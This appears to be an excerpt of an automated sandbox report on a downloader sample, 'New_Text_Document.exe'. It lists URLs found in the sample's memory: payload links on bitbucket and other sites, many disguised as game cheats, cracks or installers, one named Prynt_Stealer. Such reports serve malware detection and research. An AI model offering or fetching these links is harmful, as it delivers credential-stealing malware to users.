                    Source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1609490585.0000000008361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://awdtechnologies.com/rt/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://babaandsons.in/ud/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bacfl.com/roa/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bacfl.com/roa/?51285141
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bacfl.com/roa/?88026141
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bencevendeghaz.hu/2zjoi/aUJLqwAxxlq/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bencevendeghaz.hu/2zjoi/cwfKJOzA/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bigbenintegraciones.com/stt/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://binzayan.com/qnui/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/112download/browser/downloads/OnionBrowser.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/4afziyfqzm/afziyfqzm/downloads/new_kiddions.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/adobeofficial/adobeofficiall/downloads/Setup_EN_x64.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/aneex/gtaaaaa/downloads/Kiddions_menu.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/aneex/gtavnew/downloads/Kiddions_menu.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/aneex/kiddions_menu/downloads/Kiddions_menu.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/aneex/rust-aim-esp/downloads/Rust_AIMESP.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/aneex/warzone_2.0_unlock_tool_aim_esp/downloads/Warzone_2.0_Unlock_tool_Aim_ES
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/apilogic2023/api/downloads/Password_2022_Installer.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/contore/update/downloads/Password_2022_Installer.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/dasdadasdasdasdasddddddd/dasdasdgregreg/raw/77da89b2e333aa2a9d28c29b76b4910597
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/downcloud-load-ad/ads1022/downloads/Afterburner.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/download-aa/download_aaa/downloads/Fortnite_Hack.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/download-aa/download_aaa/downloads/Kiddions_Mod_Menu.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/dushanbepromo/kingsoft/downloads/Installs.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/dushanbepromo/kingsoft/downloads/Output.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/dushanbepromo/kingsoft/downloads/Prynt_Stealer_5.6.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/dushanbepromo/kingsoft/downloads/Togwcstgxg.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/dushanbepromo/kingsoft/downloads/build_2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/dushanbepromo/kingsoft/downloads/ghostworker.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/dushanbepromo/kingsoft/downloads/hastly.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/dushanbepromo/kingsoft/downloads/virus.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/easy-s0ft/easys0ft/downloads/Fortnite_Hack.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/f32f23ff23f23/imanopsecgod/raw/a4552ead90679df7722606fcbbbe122515a7f996/CL.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/f32f23ff23f23/opseeecboi/raw/4d662da16f79b1ab720ce028e18d98cd9878f0ca/LEMMIN.e
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/f32f23ff23f23/opseeecboi/raw/ec246b5c0a90e698c379eac5fa8aaf28281c6349/Brav.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/fdfffdfdd/sasa/downloads/crypted.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/foxxlrep/repo/downloads/newf.dotm
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/foxxlrep/repo/downloads/za.xlsx
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/foxxlrep/repo/downloads/zip.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/greeeengo/xcaseasd/downloads/%D0%A1S_G%D0%9E_CH%D0%90NG%D0%95R.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/greeeengo/xcaseasd/downloads/5M_MOD_MENU.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/greeeengo/xcaseasd/downloads/G%D0%BEd_of_war_Ragnar%D0%BEk_Cr%D0%B0%D1%81k.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/greeeengo/xcaseasd/downloads/SONIC_FRONTIERS_CRACKED.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/jhjhhjhjjhhj/regge/downloads/F%D0%BErtnit%D0%B5_H%D0%A1.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/jwgo-software/software_good/downloads/SvCpJuhbT.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/lucianoeasy1/whythefuckareutryingtotrackthishttpdebuggerlol/raw/67c59c70dfb800
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/lucifer61156/thisisforeducationalpurposesonly/raw/bc18553af2861543b406b0ca967d
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/myworkescxz/meyca/downloads/Soft.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/neironner/app/downloads/AppWeSoft.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/neonbatsv4/neonbats2/downloads/NeonBatsLoader.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/nobodoimportante/diniasndiasnid/raw/f9296891a4af851f86f26f100be89a44da6958f3/l
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/nobodoimportante/diniasndiasnid/raw/f9296891a4af851f86f26f100be89a44da6958f3/r
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/osaka123/mahoa1/downloads/SuburbansKamacite.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/rpoverka/zhopa/downloads/1bz7KfahvU.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/rpoverka/zhopa/downloads/SystemUpdate.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/rpvpov0nqt/rpvpov0nqt/downloads/Fortnite_hack.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/rpvpov0nqt/rpvpov0nqt/downloads/Roblox_Doors_src.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/rpvpov0nqt/rpvpov0nqt/downloads/new_kiddions.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/samesaaa/123/downloads/TJeAjWEEeH.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/shgz2/sghz3/downloads/Fortnie_Hack.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/shgz2/sghz3/downloads/Kiddions_Mod_Menu.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/skinchanger/skinchanger/downloads/glassadequatepro.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/slack-files/windows/downloads/SIackSetupWin.iso
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/softwarefiles/fulldownloadhere/downloads/Main_Setups_Full_Version.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/tautaracheats-dwnld/tautaracheats/downloads/Fortnite_Cheat.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/thisisaworkspace/94f8j3984fj9348jf/raw/9835c82132a066ab11c152f43a64d0dcc99f996
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/thisisaworkspace/bumogak/raw/cf339d8869a4980f17da4d2a7ca92d4cd8dfa47b/DCKA.exe
